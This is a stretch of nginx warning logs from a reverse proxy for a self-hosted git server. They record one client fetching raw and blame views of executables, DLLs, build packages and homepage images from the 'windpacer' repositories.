74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" +2026/02/17 13:46:33 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/10/0000014106 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" +2026/02/17 13:46:36 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/10/0000014107 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" +2026/02/17 13:47:01 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/10/0000014108 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" +2026/02/17 13:47:34 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/10/0000014109 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +2026/02/17 13:47:39 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/11/0000014110 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +2026/02/17 13:47:55 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/11/0000014111 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" +2026/02/17 13:48:24 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/11/0000014112 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" +2026/02/17 13:51:03 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/11/0000014113 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +2026/02/17 13:51:40 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/11/0000014114 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" +2026/02/17 13:52:11 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/11/0000014115 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" +2026/02/17 13:52:18 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/11/0000014116 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" +2026/02/17 13:52:59 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/11/0000014117 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" +2026/02/17 13:53:15 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/11/0000014118 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +2026/02/17 13:54:01 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/11/0000014119 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" +2026/02/17 13:54:27 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/12/0000014120 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" +2026/02/17 13:54:29 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/12/0000014121 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" +2026/02/17 13:54:32 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/12/0000014122 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" +2026/02/17 13:54:40 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/12/0000014123 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" +2026/02/17 13:54:47 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/12/0000014124 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" +2026/02/17 13:54:55 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/12/0000014125 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +2026/02/17 13:55:15 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/12/0000014126 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" +2026/02/17 13:55:20 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/12/0000014127 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" +2026/02/17 13:55:27 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/12/0000014128 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" +2026/02/17 13:55:33 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/12/0000014129 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" +2026/02/17 13:55:41 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/13/0000014130 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" +2026/02/17 13:55:48 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/13/0000014131 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" +2026/02/17 13:55:57 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/13/0000014132 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" +2026/02/17 13:56:05 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/13/0000014133 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" +2026/02/17 13:56:07 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/13/0000014134 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" +2026/02/17 13:56:13 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/13/0000014135 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" +2026/02/17 13:56:19 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/13/0000014136 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" +2026/02/17 13:56:27 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/13/0000014137 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" +2026/02/17 13:56:34 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/13/0000014138 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" +2026/02/17 13:56:41 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/13/0000014139 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" +2026/02/17 13:56:47 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/14/0000014140 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" +2026/02/17 13:56:55 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/14/0000014141 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" +2026/02/17 13:57:01 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/14/0000014142 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +2026/02/17 13:57:03 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/14/0000014143 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +2026/02/17 13:57:13 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/14/0000014144 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" +2026/02/17 13:57:20 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/14/0000014145 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" +2026/02/17 13:57:28 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/14/0000014146 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" 